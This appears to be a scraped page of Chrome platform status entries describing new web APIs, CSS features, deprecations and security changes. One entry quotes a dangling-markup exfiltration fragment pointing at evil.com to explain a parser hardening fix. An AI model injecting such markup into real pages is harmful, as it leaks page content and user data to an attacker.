赞
踩
From https://chromestatus.com/features
<iframe sandbox>
keywordAdds a new keyword named “allow-top-navigation-by-user-activation” for iframe sandbox, which requires a user activation (or gesture) being processed to trigger a top-level navigation. This change would enable more use cases of sandboxing untrusted third-party contents (eg., ads) by allowing top navigation while blocking malicious auto-redirecting, and thus help building a safer internet (eg., a safer ads ecosystem in which all ads could be sandboxed to prevent malicious auto-redirecting).
<abbr>
and <acronym>
have underline by default<abbr>
and <acronym>
should have dotted underline by default according to the HTML standard.
In WebAPK mode, frames that are within the WebAPK manifest scope will be allowed to autoplay media unmuted.
This entry tracks exposing ClipboardEvent constructor.
data:
URLsHTML specifies that data:
URLs can be used to create workers with opaque origins. We should support this as a first step towards defining a sandboxing mechanism for Workers (and parity with other browsers).
Require that one of ‘audioCapabilities’ and ‘videoCapabilities’ be specified in the configuration passed to navigator.requestMediaKeySystemAccess(), and require that the contentType strings used as part of the entries to ‘audioCapabilities’ and ‘videoCapabilities’ include the desired codec as part of the MIME type. This item covers two bugs though only one is listed under the status section: https://crbug.com/605661, https://crbug.com/616233
For input types which don’t support text selection API, we have thrown InvalidStateError. The specification was changed so that null is returned in such case.
IndexedDB 2.0 introduces a few APIs that optimize some database access patterns and improve programming ergonomics. Chrome will support the full standard by shipping the following features:
support for binary keys, object store and index renaming, getKey() on IDBObjectStore, getPrimaryKey() on IDBIndex.
When users are on slow connections, Chrome will show an offline copy of a page if there is an offline version of the page available on the user’s device. Users will be shown a lite mode UI in the omnibox.
If Chrome determines the network has 2G speeds and there’s an offline page stored, Chrome shows the offline page. Chrome’s offline pages are based on MHTML snapshots. An intervention report is sent when this optimization occurs.
A performance API to enable applications to detect presence of “long tasks” that monopolize the UI thread for extended periods of time and block other critical tasks from being executed - e.g. reacting to user input.
A mouse on an Android M (or later) device:
(a) will no longer fire TouchEvents, and
(b) will fire a consistent sequence of MouseEvents with appropriate buttons & other properties.
Before this change, a low-level mouse events in Android reached blink as a touch event, hence fired a touch event then a compat mouse event if the touch event went uncanceled.
We propose extending the “controls” attribute of the HTMLMediaElement so that the website could enable/disable certain media controls without having to implement all the controls on its own. A “controlsList” property will be added reflecting the current value of “controls” similar to the “class” and “classList” on HTMLElement.
As a muted video with autoplay attribute only starts playing when it’s becoming visible, it’s reasonable to pause them when invisible to reduce power usage.
An API to return all the coalesced events of the received events in javascript. This API enables apps like drawing app to draw smoother curves using the precise history of points.
This is a spec-compliant version of RTCPeerConnection.getStats returning a promise resolved with RTCStatsReport, a maplike containing RTCStats dictionaries.
Stats are being implemented according to the spec in a continuous effort for coverage to become good enough that the old getStats method can be deprecated.
The old getStats (taking a callback as argument) is very different from the spec and riddled with goog-prefixed things.
Implement setConfiguration according to WebRTC 1.0 and JSEP. This API allows an application to change the set of ICE servers, ICE candidate policy, and ICE candidate pool size without creating a new RTCPeerConnection.
In a case where document already has text selection and Selection.addRange() is called, Blink merges the Range and the existing text selection into one if they have overlap, and does nothing otherwise.
We’ll change it so that Blink always ignore the Range. It matches to Edge.
Blink had a bug that getRangeAt() always returns a new Range with position normalization. It didn’t match to Edge, Firefox, and Selection API specification.
Selection interface should support removeRange() function to remove the specified Range.
setBaseAndExtent() silently clamped too large offset values. IndexSizeError should be thrown for such values to match to Firefox, Edge, and the specification.
These function silently normalized the specified position with DOCTYPE. However, they should throw InvalidNodeTypeError to match to Edge, Firefox, and the specification.
Adding support of tangentialPressure and twist attributes in the pointer events API on Mac. They are supported by some stylus devices and are already used in numerous painting apps.
This adds restrictions on cookies marked with the ‘Secure’ attribute. Currently, Secure cookies cannot be accessed by insecure (e.g. HTTP) origins. However, insecure origins can still add Secure cookies, delete them, or indirectly evict them. This feature modifies the cookie jar so that insecure origins cannot in any way touch Secure cookies. This does leave a carve out for cookie eviction, which still may cause the deletion of Secure cookies, but only after all non-Secure cookies are evicted.
A small modification to JavaScript syntax allows trailing comma in formal parameter lists and in argument lists. For example, all the following become valid:
function f(a, b,) { return a + b }
let g = (a, b,) => a + b
f(1, 2,) + g(3, 4,)
This is expected to be available by default in Chrome 58.
The CSS ‘line-break’ property specifies the strictness of line-breaking rules. The exact definition of the strictness depends on languages.
Our implementation relies on ICU (see doc link) which supports East Asian writing systems and Finnish.
Currently, WebAudio will use the lowest latency possible for the audio device for the best interactive behavior. However, for some use-cases such as media playback, this causes unnecessary power and/or CPU utilization.
The latencyHint is a hint from the developer that such a latency is not required. The latencyHint is either an AudioContextLatencyCategory value or a double specifying the desired numeric latency. This is a hint to Chrome.
Currently the AudioBuffer constructor takes two arguments: the context, and the AudioBufferOptions. The context argument is removed so that only AudioBufferOptions is required. In addition the sampleRate member of AudioBufferOptions is now required.
The XSS Auditor’s violation reports are now sent with a MIME type of application/xss-auditor-report
(as opposed to application/json
).
Expose the approximate range of colors supported by the user agent and the output device in a CSS Media Query.
display: flow-root generates a block container box, and lays out its contents using flow layout. It always establishes a new block formatting context for its contents.
These non-standard CSS classes are used to differentiate the span elements added by Blink itself in editing.
There are two special values for the CSS zoom property that are inconsistently documented: “reset” and “document”.
They set the element’s zoom to 1.0 regardless of parent element zoom status and prevent page zoom from affecting the element’s size.
We’re removing them.
“Compatibility caseless” had been applied to usemap attribute matching. The specification was updated so that case-sensitive matching is applied. https://github.com/whatwg/html/commit/6acdb2122298d2bb7bb839c0a61b4e1f9b0f9bc9 A deprecation warning is printed to the console starting in Chrome 57.
According to https://github.com/whatwg/dom/issues/211, setting cancelBubble to true is considered as an alias to stopPropagation(), and the spec indicates setting cancelBubble to false should do nothing.
That an interface has a legacy caller means that an instance can be called as a function. This used to be the case for HTMLEmbedElement and HTMLObjectElement but is being removed. Calling will instead throw an exception. This was deprecated in Chrome 57.
Per https://w3c.github.io/webappsec-secure-contexts/, we are deprecating and then removing EME from insecure contexts. EME is a powerful feature that exposes DRM implementations that involve access to persistent unique identifiers, are not open source, and/or run unsandboxed or with privileged access. The risks are increased when exposed via insecure HTTP, because they could be attacked by anyone on the channel. This was deprecated in Chrome 44.
In 2013, Chrome 31 deployed new TLS cipher suites based on Prof. Dan Bernstein’s ChaCha20 and Poly1305 algorithms. This was later standardized, with small tweaks, at the IETF as RFC 7539 and RFC 7905. We shipped the standardized variant early in 2016 with Chrome 49. We are now removing the pre-standard variants.
RFC 2818 describes two methods to match a domain name against a certificate - using the available names within the subjectAlternativeName extension, or, in the absence of a SAN extension, falling back to the commonName.
The fallback to the commonName was deprecated in RFC 2818 (published in 2000), but support still remains in a number of TLS clients, often incorrectly.
The interface elements regions, addRegion() and removeRegion() have been removed from the WebVTT spec and will be removed from Chrome. The VTTCue.region property was added and the VTTRegion interface was updated to match a late version of the specification.
Remove the AudioSourceNode interface. This interface is not part of the WebAudio specification, is not constructible, and has no attributes so it basically has no user-accessible functionality.
The dropzone global attribute was introduced by the HTML5 drag and drop specification as a declarative method for specifying an HTML element’s willingness to be the target of a drag-and-drop operation, the content types that can be dropped onto the element, and the drag-and-drop operation (copy/move/link).
No browser has implemented the unprefixed version. Blink and WebKit implement a prefixed form of the attribute, webkitdropzone. We would like to remove the prefixed attribute.
Support for animated PNG images
CSP3 allows hash expressions to match external scripts, by relying on SRI as underlying infrastructure. That is, given Content-Security-Policy: script-src 'sha256-abc123' 'sha512-321cba'
, <script integrity="sha256-abc123" ...></script>
will be allowed.
The ‘worker-src’ directive restricts the URLs which may be loaded as a Worker, SharedWorker, or ServiceWorker. It falls back to ‘child-src’ (which, in turn, falls back to ‘default-src’).
04 .CSP: report-sample
property in violation reports
The report-sample
property attempts to reach consensus on an opt-in variant Firefox’s behavior. In short, we’ll collect a 40-character sample for inline script and style violations, and include it in the violation report (and associated SecurityPolicyViolationEvent object) iff a ‘report-sample’ expression is present in the violated directive.
Shorthand properties to control the alignment behavior along block and inline axes in a single declaration.
The default display style of a DIALOG element is changed from inline to block.
The DeviceOrientationEvent and DeviceMotionEvent constructors are defined by the DeviceOrientation Event Specification but were not were not implemented in Chrome. Firefox has already shipped these constructors as specified.
Request#url now includes the URL fragment, as per the spec. Before Chrome 59, the fragment was stripped out.
This means service workers can see the URL fragment in the ‘fetch’ event handler.
Headless mode allows running Chromium in a headless/server environment. Expected use cases include loading web pages, extracting metadata (e.g., the DOM) and generating bitmaps from page contents – using all the modern web platform features provided by Chromium and Blink.
To use headless, start Chrome with a command line flag:
$ chrome --headless --remote-debugging-port=9222 https://chromium.org
The MediaError.message DOMString field provides, if available, any additional vendor-specific error message detail to assist web authors debugging media player errors. The format and content of the string is left to vendors, though it’s commonly in the form of a vendor-specific error code followed optionally by a “:” and further detail about the error. It is populated at the time of MediaError creation.
Enable taking pictures from an Image/Video Capture Device.
An API that enables the browser to send “preload” network requests for navigations before executing the fetch event handler in the service worker that intercepts the target URL. The worker has access to the preload response inside the fetch event handler. Common use cases would be to respond with the preload response directly, or use it to populate the response.
The parts of the RTC Media API (https://w3c.github.io/webrtc-pc/#rtp-media-api) that allow keeping track of contributing sources for receiving tracks. RTCPeerConnection extension: getReceivers(). RTCRtpSender support: track, getContributingSources(). RTCRtpContributingSource support: timestamp, source.
Feature for the rest of the API:
https://www.chromestatus.com/feature/5347809238712320
This is implementing the receiving side of the API in order to allow a web page to be presented and interact with the presenting web page. This is also called 1-UA mode because that mode would allow the browser to render both presenting and receiving pages locally.
Normally, ICE candidates are only gathered after RTCPeerConnection.setLocalDescription is called, because this is the point at which the PeerConnection knows how many ports it needs. The iceCandidatePoolSize member of RTCConfiguration instructs the PeerConnection to gather ICE candidates before this occurs, as a performance optimization. Thus, if setting the local description is delayed (by signaling, for example), interactions with STUN/TURN servers can occur in parallel.
This feature adds the icegatheringstatechange event and the onicegatheringstatechange event handler to RTCPeerConnection.
Add the ability for CSS stylesheets to specify their own referrer policy via the HTTP header.
The Screen object is no longer required to return 24 for colorDepth and pixelDepth. It enables websites to have a better idea of the number of bits being used to display a color on the screen.
ReadableStream’s pipeTo() is the standard way to compose readable and writable streams. It reads data from the ReadableStream and writes it to a WritableStream while respecting backpressure.
pipeThrough() is a simple wrapper around pipeTo() that provides elegant syntax for chaining multiple streams.
WritableStream is part of the Streams API for creating, composing, and consuming streams of data. It is the writable counterpart to ReadableStream, which is already shipping in Chrome. It provides a standard abstraction for writing streaming data to a sink, with built-in backpressure and queuing. This is expected to be on by default in Chrome 59.
According to the spec, decodeAudioData detaches the given ArrayBuffer before decoding. This means that the ArrayBuffer no longer has any contents and can’t be reused or examined.
If it’s important to keep the data, user ArrayBuffer.slice(0) to make a copy for decodeAudioData.
Align touchmove events so that they occur close to requestAnimationFrame() as possible.
self.origin returns the Unicode serialization of the origin of the settings object of the global represented by “self” (a Window or WorkerGlobalScope). This gives scripts a consistent way of getting their origin in both situations. Note that unlike location.origin this represents the actual origin of the global, not the origin of the URL it’s loaded from. The difference can be substantial in the case of sandboxing, for example.
SDCH is a shared dictionary compression mechanism developed by Google but not standardized. It’s use in chrome is being discontinued.
Intent to deprecate thread: https://groups.google.com/a/chromium.org/forum/#!searchin/blink-dev/SDCH%7Csort:relevance/blink-dev/nQl0ORHy7sw/HNpR96sqAgAJ
In SVG2, hasFeature always return true.
So requiredFeatures attribute not doing anything useful.
It has been removed from the spec:
https://github.com/w3c/svgwg/commit/9a30d01f6410dc516c5f874d71e957230a3448cd
This was deprecated in Chrome 54/Opera 41.
-internal-media-controls-cast-button selector exposes Blink internal shadow DOM to the web content. Authors that want to have a custom cast button should use custom controls and implement a cast button with the Remote Playback API.
-internal-media-controls-text-track-list* selectors expose Blink internal shadow DOM to the web content. Authors that want to have a custom text track picking interface should use custom controls.
We should block requests for subresources that contain embedded credentials (e.g. “http://ima_user:hunter2@example.com/yay.tiff”). Such resources would be handled as network errors.
We should block requests from HTTP/HTTPS documents that target “legacy” schemes (e.g. “ftp://my-awesome-ftp-server.com/yay.tiff”). That is, the ftp://
image referenced in https://jsbin.com/petonig/edit?html,output would not load, as the document itself is not served from ftp://
.
Remove the support for “hover: on-demand” and “any-hover: on-demand” media queries. The “on-demand” value used to satisfy for the pointing devices that, for example, “can’t normally hover, but will activate hover on a long press”.
The “on-demand” value for hover/any-hover media queries has been removed from the spec in early 2016.
The Service Worker spec has always had the (non-normative) note that “any type of synchronous requests must not be initiated inside of a service worker”, to avoid blocking the service worker (as blocking the service worker would block all network requests from controlled pages). However synchronous APIs such as FileReaderSync were still available in service workers. So we’d like to fix that by removing this API from service workers. This was deprecated in Chrome 57.
Temporarily stop an origin from requesting a permission following the third dismissal of a permission prompt. The stop will be lifted after some amount of time has passed (initially 1 week), after which the origin may request the permission again. A further dismissal will apply the temporary stop again.
For web developers who are testing features, the block can also be removed by changing the permission’s setting in the lock icon’s page info dialog, or by clearing your browsing data.
The CSS line-height-step property provides an ability to round the heights of line boxes to the multiple of the specified length. This property allows authors to control vertical rhythm.
createElementNS() should now throw only InvalidCharacterError, not NamespaceError.
Validating a qualified name should only throw InvalidCharacterError, not NamespaceError,
after:
https://github.com/whatwg/dom/issues/319
https://github.com/w3c/web-platform-tests/issues/5161
https://github.com/whatwg/dom/issues/423
Latest spec:
https://dom.spec.whatwg.org/#validate
Align continuous mouse events (mousemove, mousewheel) so that they occur close to requestAnimationFrame() as possible.
Historical events can be accessed via getCoalescedEvents (see https://w3c.github.io/pointerevents/extension.html#extensions-to-the-pointerevent-interface)
Web payments is a W3C standard API for e-commerce websites to collect payment information from users with user consent. This feature lets users pay using native Android payment apps.
Adds the @font-face descriptor and a corresponding property for controlling how a downloadable font renders before it is fully loaded.
Add support the the CSS font-stretch property.
The :focus-within pseudo-class applies to elements for which the :focus pseudo class applies.
An element also matches :focus-within if one of its descendants in the flat tree (including non-element nodes, such as text nodes) matches the conditions for matching :focus.
The type read-only property of the Client interface indicates the type of client the service worker is controlling.
The new asynchronous clipboard API makes use of DataTransfer objects and has a need to be able to construct new ones. For example (with new clipboard api):
var data = new DataTransfer();
data.items.add(“(°o°)/”, “text/plain”);
navigator.clipboard.write(data).then(function() {
console.log(“Copied to clipboard successfully! ᕕ( ᐛ )ᕗ”);
}, function() {
console.error(“Unable to write to clipboard. (╯ಠ_ಠ)╯︵ ┻━┻”);
});
This feature introduces the CredentialsContainer.create method to the Credential Management API. This method allows for asynchronous creation of Credential objects.
Support new Document() to create a Document instance.
Remove tiny content exception for “Detect and run important plugin content” setting. This means that cross-origin plugin content that is 5x5 or smaller will not load under the default setting.
This change drops the SiteBoundCredential interface in
favor of a CredentialUserData mixin. This change was introduced in the
Credential Manager API specification with commit
a43865bd8aa9842dbc8d8e688d5668c087677eac
(https://github.com/w3c/webappsec-credential-management/commit/a43865bd8aa9842dbc8d8e688d5668c087677eac).
This change exposes passwords to JavaScript in the Credential Management API by providing the corresponding attribute on PasswordCredential. Furthermore it deprecates the previously existing PasswordCredential attributes and the custom fetch()
credential
infrastructure.
Allow site authors to selectively enable and disable use of various browser features and APIs.
Allows multipart/form-data and application/x-www-form-urlencoded fetch requests and responses to be consumed and parsed into FormData objects.
API to enable developers to measure time for First Paint (FP) & First Contentful Paint (FCP) – the first key moments in loading that they care about. These moments are added as ‘paint’ entries in the Performance Timing API.
InputEvent allows user input to be managed by script and help interactive with IME.
VP9 is an open and royalty-free video codec that has been supported in Chromium since 2013. This update adds a new string format for describing the encoding properties, such as the profile, level, etc. Such properties are common in video codecs but are not exposed in the current VP9 string format. In addition, this update includes using the new format to advertise support for VP9 Profile 2. The string format is accepted by media-related APIs
This introduces rest properties for object destructuring assignment and spread properties for object literals.
Add a free-form identifier for payment request. This will be set using PaymentDetailsInit and reflected through PaymentRequest and PaymentResponse and to payment apps. If no identifier is specified a unique identifier will be created.
Replace the PaymentRequest.complete enum value “” with the more descriptive “unknown”.
Chrome currently supports encrypted push message payloads encrypted with the aesgcm
content encoding (draft 03). A series of substantial changes were made to the encryption drafts, yielding a new content coding: aes128gcm
(draft 08). We’ll continue to accept aesgcm
for received push messages as well.
Static property containing the supported content encodings developers can use for encrypting push messages.
Property indicating the time at which, if any, the subscription won’t be valid anymore. The user agent will attempt to fire a pushsubscriptionchange
event with a new subscription before this happens.
Chrome will always return NULL, until we support subscription refreshes.
Calls to navigator.vibrate will immediately return ‘false’ if user hasn’t tapped on the frame or any embedded frame yet. The Vibrate API is being abused by malicious sites. This extends what we do for cross-origin iframes to all frames including top-level page. See https://www.chromestatus.com/features/5682658461876224.
requireUserMediation
to preventSilentAccess
in Credential Management APIThis change renames CredentialsContainer.requireUserMediation to CredentialsContainer.preventSilentAccess in the Credential Management API.
This feature introduces an CredentialMediationRequirement enum argument to the CredentialRequestOptions of CredentialsContainer.get() that is intended to replace the currently existing boolean flag CredentialRequestOptions.unmediated. The enum will have three states (“silent”, “optional”, “required”) with “silent” and “optional” directly mapping to the existing boolean states, “required” is a novel option.
VP9 is an open and royalty free video coding format.
ISO-BMFF (MP4) is an industry standard container and is broadly accepted and used in the industry.
Chrome already supports the VP9 codec (currently only in WebM container) and the ISO-BMFF container. This enables them to be used together.
If the requestPayerName flag was set to true in the PaymentOptions passed to the PaymentRequest constructor, then UA should collect and return the payer’s name as part of the payment request.
For example, this would be set to true to allow merchant to make a booking in the payer’s name.
This option has been behind a flag on mobile since Chrome 55. On desktop, it’s shipping in Chrome 60 with the rest of Payment Request API.
For every payment method, there must be a corresponding JSON manifest file describing how that method participates in the web payments ecosystem.
Currently, XFO performs a same origin check only against the top-level frame in a document’s ancestor chain. As lcamtuf notes in 1, “Any site that allows a rogue ad to be displayed in an IFRAME; or that frames third-party content for other reasons (e.g., iGoogle, Image Search results, Facebook gadgets), is effectively not protected).” We should check all ancestors instead.
getElementsByTagName() used to accept only local names. The DOM specification was updated to accept qualified names.
Currently, we only log a message to the console. For consistency with other APIs, the WhatWG spec now requires that window.open throws a DOMException “SyntaxError” instead.
Headers.prototype.getAll() is removed from the Fetch API specification.
The API asynchronously returns a list of existing database names in an origin, which seemed sensible enough.
The design is flawed, in that the results may be obsolete as soon as they are returned, so it can really only be used for logging, not serious application logic. Not implemented in other browsers. https://github.com/w3c/IndexedDB/issues/31 tracks/links to previous discussion on flaws and possible alternatives.
Remove non-standardize APIs from CSS Rule and Developer can use KEYFRAMES_RULE and KEYFRAME_RULE instead
Remove non-standard ‘WebKitTransitionEvent’ support of document.createEvent().
We intend to block web pages from loading data: URLs in the top frame using <A>
tags, window.open, window.location and similar mechanisms.
Pseudo URLs such as data: are generally a source of confusion for users. Because of their unfamiliarity, these schemes are widely being used in spoofing and phishing attacks. Users browsing the web ideally should only ever end up on the two well known schemes (http and https).
Deprecated in M58
Removal in M60
Correctly implement window.NodeFilter. It should not have .prototype, and NodeIterator.filter and TreeWalker.filter should not wrap JavaScript objects.
Remove non-standard ‘WebKitAnimationEvent’ support of document.createEvent().
This specification describes an API that can be used to retrieve the amount of budget an origin has available for resource consuming background operations, as well as the cost associated with doing such an operation.
The beforeunload dialog will only be shown if the frame attempting to display it has received a user gesture or user interaction (or if any embedded frame has received such a gesture). (There will be no change to the dispatch of the beforeunload event, just a change to whether the dialog is shown.)
\n
and <
characters.As discussed in https://groups.google.com/a/chromium.org/d/msg/blink-dev/KaA_YNOlTPk/VmmoV88xBgAJ, some forms of dangling markup attacks rely upon injecting an unclosed attribute that sucks up portions of a page, and exfiltrates them to an external endpoint (e.g. <img src='https://evil.com/?
eats the page until the next '
). This is possible because the URL parser helpfully discards newline characters. It would be lovely if we could make the parser less helpful.
CSP’s Embedded enforcement defines a mechanism by which a web page can embed a nested browsing context if and only if it agrees to enforce a particular set of restrictions upon itself. We should prototype an implementation to see if it’s something that solves real problems in a way we can ship.
nonce
content attribute.We’ve seen some recent attacks on CSP which rely on the ability to exfiltrate nonce data via various mechanisms that can grab data from content attributes. CSS selectors are the best example.
To mitigate these attacks, we’ll hide the attribute from these side-channels, and only expose the value to script.
Adds an optional argument to existing scroll APIs that specifies whether scrolling should be smooth. Also adds a CSS property for this.
A ‘Clear-Site-Data’ HTTP header prompts the user agent to clear browsing data associated with the requesting website. The supported browsing data types are cookies, storage (i.e. “site data”), and cache.
This is a privacy and security enhancing feature. A sensitive website can trigger local data deletion after the user signs out. A website dealing with a persistent XSS attack can use this to ‘reset’ itself to a clean state.
Add the replace() function to DOMTokenList interface. We can use it like element.classList.replace(‘inactive’, ‘active’).
Expect-CT is an HTTP header that allows sites to opt in to reporting and/or enforcement of Certificate Transparency requirements, which prevents the use of misissued certificates for that site from going unnoticed. When a site enables the Expect-CT header, they are requesting that Chrome check that any certificate for that site appears in public CT logs.
This specification describes several geometry interfaces for the representation of points, rectangles, quadrilaterals and transformation matrices with the dimension of 3x2 and 4x4.
SVGPoint, SVGRect and SVGMatrix will be aliased to new interfaces. Their old methods will be maintained and some new methods are introduced.
In the near future, CSS transform will be updated so they can work directly with the new objects. This avoid parsing on the js side.
Returns a Boolean indicating whether the Payment Request API may be invoked on a cross-origin iframe.
Client header to expose the device Memory to web applications.
Update Blink to match the CSSOM View spec’s behavior around element scrolling APIs for documentElement and body, i.e.: scrollTop, scrollLeft, scrollWidth, scrollHeight and Document.scrollingElement
type == "mousewheel" && target == window && function_name == "ssc_wheel"
The smoothscroll.js code is largely broken and is preventing us from shipping scroll top interop. With the scroll top interop behavior activated sites fail to scroll at all with the wheel event. This library was corrected a few years ago but the web continues to clone the broken version and we have been blocked in shipping this long implemented fix for interop.
Smooth scroll has been enabled in Chrome for a number of releases so using custom smooth scrolling is not necessary anymore.
<script type=module>
JavaScript modules allow a program to be divided into multiple sequences of statements and declarations. Each module explicitly identifies declarations it uses that need to be provided by other modules and which of its declarations are available for use by other modules.
<script type=module>
allows loading of JavaScript modules inside web pages.
This chrome feature tracks adding the method getPhotoSettings() 1 to the currently landed ImageCapture object [2]. It’s a trivial follow up to the MediaStream Image Capture API shipped in 59 [3].
1 https://w3c.github.io/mediacapture-image/#dom-imagecapture-getphotosettings
[2] https://cs.chromium.org/chromium/src/third_party/WebKit/Source/modules/imagecapture/ImageCapture.idl?q=imagecapture.idl&sq=package:chromium&dr
[3] https://www.chromestatus.com/features/4843864737185792
Returns the current settings of a MediaStreamTrack, including information such as (for video) width, height or framerate.
The Network Information API enables web applications to access the underlying connection information of the device.
An API that allows browsers to act as an intermediary between the three key parties in a financial transaction: the merchant (e.g. an online web store), the buyer (e.g. the user buying from the online web store), and the Payment Method (e.g. credit card). Information necessary to process and confirm a transaction is passed between the Payment Method and the merchant via the browser with the buyer confirming and authorizing as necessary across the flow.
RTCCertificate is supposed to have a getFingerprints() method.
The Referrer Policy specification includes three policy values that Chrome doesn’t yet implement.
nextHopProtocol has been in the spec for RT & NT but was not implemented in chrome yet.
It is now landed and will ship in M61
navigator.storage.estimate() - returns a Promise which resolves with {usage, quota} values in bytes.
Historically the SyncManager interface was only exposed to the window and service workers. This feature exposes the interface to all workers.
Sorts all name-value pairs stored in a URLSearchParams. Proposed at https://github.com/whatwg/url/issues/26 to improve cache hit rate easily.
URLSearchParams’ constructor has been changed in https://github.com/whatwg/url/pull/175. It is now possible to create a new URLSearchParams by passing it any object (e.g. new URLSearchParams({'foo': 'bar'})
).
Update colSpan max value from 8190 to 1000 as per spec change.
https://html.spec.whatwg.org/#dom-tdth-colspan
https://html.spec.whatwg.org/#dom-col-span
https://html.spec.whatwg.org/#dom-colgroup-span
The web platform API to support programming USB devices.
Validate asm.js code and use type information to optimize the low-level subset of JavaScript.
getAttributeNames() is a function to rerun a list of attribute names of an element.
Previously we had onwheel attributes as part of the Element. Now we are moving them to GlobalEventHandlers to make them consistent with the other on’event’ attributes.
Exposes information about the visual viewport to the page.
In aligning with Blink’s intention to remove powerful features on insecure origins, we plan to deprecate and remove support for the Presentation API on insecure contexts. PresentationRequest and PresentationReceiver where deprecated on insecure origins in Chrome 61. Removal is anticipated in Chrome 72 (February 2019).
If a page shows a JavaScript dialog while it is in fullscreen (the HTML5 kind), it is exited from fullscreen.
Allow a non-document (or <body>
) element to hide URL bar, generate overscroll glow, etc. on scrolling, effects normally reserved for “viewport scrolling” only.
<data>
element<data>
element
<time>
element<time>
element
This API lets MediaSource apps more effectively customize the HTMLMediaElement.seekable range logic by providing (or removing) a single seekable range that is union’ed with the current buffered ranges to result in a single seekable range which fits both, when media duration is infinite.
Update the CSS color parser to support 8/4-digit hex color. Legacy HTML attribute color parsing, per the “rules for parsing a legacy colour value” of the HTML micro syntax (http://bit.ly/1WF2Yre), will not be changed (see http://bit.ly/1UEDbiO), nor will the CSS hashless color quirk (https://quirks.spec.whatwg.org/#the-hashless-hex-color-quirk).
We want to fix an issue in how Chrome generates the Accept-Language HTTP headers from user language preferences. As websites sometimes only accept languages without region (i.e. “en” vs “en-AU”), a user could receive websites in an unexpected language. We plan to add the base language in the correct position so that users receive webpages in their preferred language.
Mouse events are not sent when the nodes under the mouse change during layout.
This then represents an incorrect state in that the hover state of where the mouse actually doesn’t match the current hover state of the document.
To fix a variety of issues we will start dispatching mouse transitional events and update the hover state shortly after layout has been executed.
This will match Firefox behavior.
Allow developers to selectively enable and disable use of Fullscreen through the Feature-Policy HTTP header or the <iframe>
“allow” attribute. The identifier for the feature in policies is “fullscreen”. By default, fullscreen is allowed in all top-level documents, and in same-origin frames. This is similar to the existing <iframe>
“allowfullscreen” attribute, but allows control over which origins will be allowed to use the feature when hosted inside of the frame.
visibility:collapse is supposed to hide table rows while preserving their contribution to column widths. Right now blink treats visibility:collapse as visibility:hidden, which merely skips painting the rows, leaving blank space in their place instead of allowing their space to be used for other content.
If a Data Saver user is on a 2G-speed or slower network according to the NetInfo API, Chrome replaces images with placeholders and sends an intervention header on every resource request. Placeholders are the same dimensions as the original image to maintain site layout. Users are shown a Lite Mode UI in the omnibox. Users can load the image by long-pressing on the placeholder, or load all images by tapping “Show original” in the UI. An intervention report is sent when this optimization occurs.
The restriction on escape sequences in template literals has been loosened. This enables new use cases for template tags, such as writing a LaTeX processor.
<video>
/<audio>
)“Media Capture from DOM Elements” document by W3C defines captureStream() method that allows the capture of a <video>
/<audio>
element in the form of a MediaStream. We want to implement the necessary Blink and Chromium sections that would create this stream by accessing the <video>
/<audio>
output according to the given play back constraints.
This API provides network performance information to developers, as perceived by the UA, in a format that’s easy to consume and act upon: UA monitors latency and throughput of recent requests and provides estimates for effective RTT, throughput, and connection type that developers should optimize for - e.g. if the recently observed latency and/or throughput is low, the effective connection type will be mapped to a “low” value like 2G or 3G, regardless of the underlying network technology.
OpenType variable fonts integration in the layout engine affects at least the following aspects:
Need to support modifiers with the same identifier but different data. One use case for this is to support card payments with different modifiers for credit vs. debit cards. This change adds the PaymentDetailsModifier.data field to supply the different data.
Performance.timeOrigin was defined in High Resolution Time 3. The attribute is useful for developers to be able to compare timings of objects (like windows or workers) with different time origins.
dotAll
mode / s
flagThe new s
flag for ECMAScript regular expressions makes .
match any character, including line terminators.
Lookarounds are zero-width assertions that match a string without consuming anything. ECMAScript has lookahead assertions that does this in forward direction, but the language is missing a way to do this backward which the lookbehind assertions provide. With lookbehind assertions, one can make sure that a pattern is or isn’t preceded by another, e.g. matching a dollar amount without capturing the dollar sign.
FLAC is a lossless audio coding format, already supported in regular Chrome HTML5 playback. This feature adds support for FLAC in ISO-BMFF to Chrome HTML5 Media Source Extensions (MSE).
As per the spec,
"The start IDL attribute must reflect the content attribute of the same name, with a default value of 1.
This means that the start IDL attribute does not necessarily match the list’s starting value, in cases where the start content attribute is omitted and the reversed content attribute is specified."
The constructor for an OfflineAudioContext now accepts a dictionary argument to specify the options needed to construct the context. This is an addition to the existing constructor that takes three arguments.
Adding attribute event handlers to visualViewport.
i.e. visualViewport.onresize and visualViewport.onscroll
(This is a minor fix to the shipped implementation)
PaymentMethodData is used in the PaymentRequest constructor, the PaymentRequestEvent, and the CanMakePaymentEvent. It’s supportedMethods property holds and identifier indicating the payment methods a merchant accepts. Currently, this property takes either a string or array. After this change, it will only take a string.
This interface is removed from the spec.
https://svgwg.org/svg2-draft/paths.html#InterfaceSVGPathElement.
The getStreamById method on RTCPeerConnection is being removed. See https://crbug.com/698163#c10 for a replacement if you depend on this.
Remove access to the Notifications API on insecure origins. This will prevent sites from requesting notification permission or creating non-persistent local notifications over HTTP.
Sites using the Notification API for web push must already be on secure origins due to the requirement for a service worker. Removal is anticipated in Chrome 62.
Remove the ability to call Notification.requestPermission() from non-main frames.
This change will align the requirements for notification permission with that of push notifications, easing friction for developers. It allows us to unify notification and push permissions.
SharedWorker.workerStart has been deprecated for a while in the spec, and is not supported by other major browsers.
Async Generator functions and a new iteration protocol (used by for-await-of loops and yield* expressions), to streamline consumption or implementation of streaming data sources.
support ‘q’ absolute length unit.
1q is equivalent to 1/40th of 1cm.
Add support for font-variant-east-asian and respective mapping for the font: shorthand and the font-variant: shorthand.
CSS overscroll-behavior
allows developers to decide the browser’s behavior once a scroller has reached its full extent. The unused delta can be propagated to the parent causing scroll chaining, create a glow/bounce effect without chaining, or just get consumed silently. This would be a standardization of “-ms-scroll-chaining” with some modification.
JS API to expose the device Memory to web applications.
EventTarget.addEventListener/removeEventListener throws a TypeError when the second argument |callback| is neither of EventListener nor Null nor Undefined.
Historically Blink had not been reporting a TypeError for the second argument of EventTarget.{add,remove}EventListener, but reports a TypeError since M63.
Blink now follows the DOM and HTML specs and declares HTMLAllCollection, HTMLCollection, HTMLFormControlsCollection and HTMLOptionsCollection with the [LegacyUnenumerableNamedProperties] extended attribute. Its named properties are no longer marked as enumerable, being left out of calls to e.g. Object.keys() and for-in loops.
Interface properties that return a Promise now reject (meaning they’ll invoke a catch block) instead of throwing an exception. This has already been done for functions.
Intl.PluralRules is a new API which exposes language-dependent data on pluralization forms of numbers. Given a locale and a number, Intl.PluralRules outputs a category, which can then be used for selection of the pluralization form of surrounding text.
This JavaScript feature adds a “function-like” import() module loading syntactic form to JavaScript.
